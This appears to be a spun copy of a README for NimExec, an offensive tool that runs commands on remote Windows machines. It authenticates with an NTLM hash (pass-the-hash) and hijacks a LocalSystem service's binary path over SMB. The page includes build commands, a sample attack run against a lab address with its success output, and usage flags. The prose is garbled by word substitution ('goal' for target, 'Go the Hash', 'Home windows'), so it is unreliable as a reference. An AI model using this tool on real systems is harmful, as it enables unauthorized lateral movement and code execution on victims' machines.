Principally, NimExec is a fileless distant command execution software that makes use of The Service Management Supervisor Distant Protocol (MS-SCMR). It modifications the binary path of a random or given service run by LocalSystem to execute the given command on the goal and restores it later through hand-crafted RPC packets as a substitute of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.
NimExec wants an NTLM hash to authenticate to the goal machine after which completes this authentication course of with the NTLM Authentication technique over hand-crafted packages.
Since all required community packages are manually crafted and no working system-specific capabilities are used, NimExec can be utilized in several working techniques through the use of Nim’s cross-compilability help.
This venture was impressed by Julio’s SharpNoPSExec software. You possibly can suppose that NimExec is Cross Compilable and built-in Go the Hash supported model of SharpNoPSExec. Additionally, I discovered the required community packet constructions from Kevin Robertson’s Invoke-SMBExec Script.
nim c -d:launch --gc:markAndSweep -o:NimExec.exe Important.nim
The above command makes use of a special Rubbish Collector as a result of the default rubbish collector in Nim is throwing some SIGSEGV errors in the course of the service looking out course of.
Additionally, you’ll be able to set up the required Nim modules through Nimble with the next command:
nimble set up ptr_math nimcrypto hostname
check@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo check > C:UsersPublictest.txt"' -v_..._
.-'_..._''.
_..._ .--. __ __ ___ __.....__ __.....__ .' .' '.
.' '. |__|| |/ `.' `. .-'' '. .-'' '. / .'
. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . '
| ' ' || || | | | | |/ /________ ____ _____/ /________ | |
| | | || || | | | | || |`. .' /| || |
| | | || || | | | | | .--- ----------' `. `' .' .-------------'. '
| | | || || | | | | | '-.____...---. '. .' '-.____...---. '. .
| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/
| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ /
| | | | .' / `. `. `
'--' '--' '----' '----'
@R0h1rr1m
[+] Related to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Related to IPC Share of goal!
[+] Opened a deal with for svcctl pipe!
[+] Sure to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager deal with is obtained!
[+] Variety of obtained companies: 265
[+] Chosen service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Earlier Service Path is: C:Windowssystem32svchost.exe -k netsvcs
[+] Service config is modified!
[!] StartServiceW Return Worth: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service begin request is distributed!
[+] Service config is restored!
[+] Service deal with is closed!
[+] Service Supervisor deal with is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!
It is examined in opposition to Home windows 10&11, Home windows Server 16&19&22 from Ubuntu 20.04 and Home windows 10 machines.
-v | --verbose Allow extra verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Goal> Lateral motion goal.*
-c | --command <Command> Command to execute.*
-d | --domain <Area> Area identify for NTLM Authentication.
-s | --service <Service Title> Title of the service as a substitute of a random one.
--help Present the assistance message.